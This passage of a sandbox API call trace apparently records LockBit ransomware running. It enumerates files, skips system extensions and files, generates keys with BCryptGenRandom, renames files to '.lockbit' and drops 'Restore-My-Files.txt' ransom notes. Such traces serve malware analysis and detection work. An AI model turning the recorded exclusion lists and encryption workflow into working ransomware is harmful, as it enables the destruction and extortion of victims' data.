dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0106.652] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.652] malloc (_Size=0x40068) returned 0x3e70008 [0106.652] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1696) returned 1 [0106.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.652] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0106.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0106.653] ReadFile (in: hFile=0x3ac, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0106.658] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.658] malloc (_Size=0xa6) returned 0x77d800 [0106.658] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.658] free (_Block=0x77d800) [0106.658] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.659] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.659] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.659] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82945500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82945500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x5ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00152_.WMF", cAlternateFileName="")) returned 1 [0106.659] lstrcmpiW (lpString1=".", lpString2="BL00152_.WMF") returned -1 [0106.659] lstrcmpiW (lpString1="..", lpString2="BL00152_.WMF") returned -1 [0106.659] PathFindExtensionW (pszPath="BL00152_.WMF") returned=".WMF" [0106.659] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.659] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.660] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.660] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.661] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00152_.WMF") returned 1 [0106.661] lstrcmpiW (lpString1="ntldr", lpString2="BL00152_.WMF") returned 1 [0106.661] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00152_.WMF") returned 1 [0106.661] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00152_.WMF") returned 1 [0106.661] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00152_.WMF") returned -1 [0106.661] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00152_.WMF") returned 1 [0106.661] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00152_.WMF") returned 1 [0106.661] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.661] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned=".WMF" [0106.662] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.662] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.662] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.663] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.663] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.663] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.663] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.663] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.663] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.663] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.663] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.lockbit") returned 72 [0106.663] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0106.664] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.664] malloc (_Size=0x40068) returned 0x3ef0008 [0106.664] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1516) returned 1 [0106.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0106.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0106.665] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0106.669] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.669] malloc (_Size=0xa6) returned 0x77d800 [0106.669] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.669] free (_Block=0x77d800) [0106.670] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.670] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.670] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.670] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a72500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95a72500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0xf92, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00194_.WMF", cAlternateFileName="")) returned 1 [0106.670] lstrcmpiW (lpString1=".", lpString2="BL00194_.WMF") returned -1 [0106.670] lstrcmpiW (lpString1="..", lpString2="BL00194_.WMF") returned -1 [0106.670] PathFindExtensionW (pszPath="BL00194_.WMF") returned=".WMF" [0106.670] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.670] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.671] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.671] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.672] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00194_.WMF") returned 1 [0106.672] lstrcmpiW (lpString1="ntldr", lpString2="BL00194_.WMF") returned 1 [0106.672] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00194_.WMF") returned 1 [0106.672] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00194_.WMF") returned 1 [0106.672] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00194_.WMF") returned -1 [0106.672] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00194_.WMF") returned 1 [0106.673] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00194_.WMF") returned 1 [0106.673] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.673] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned=".WMF" [0106.673] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.673] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.673] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.674] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.674] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.lockbit") returned 72 [0106.674] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0106.675] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.675] malloc (_Size=0x40068) returned 0x3d70048 [0106.675] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3986) returned 1 [0106.675] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0106.675] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.676] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0106.676] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0106.681] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.681] malloc (_Size=0xa6) returned 0x77d800 [0106.681] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.681] free (_Block=0x77d800) [0106.682] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.682] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.682] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81632800, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81632800, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1f86, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00195_.WMF", cAlternateFileName="")) returned 1 [0106.682] lstrcmpiW (lpString1=".", lpString2="BL00195_.WMF") returned -1 [0106.682] lstrcmpiW (lpString1="..", lpString2="BL00195_.WMF") returned -1 [0106.682] PathFindExtensionW (pszPath="BL00195_.WMF") returned=".WMF" [0106.682] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.682] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.683] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.683] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.684] lstrcmpiW 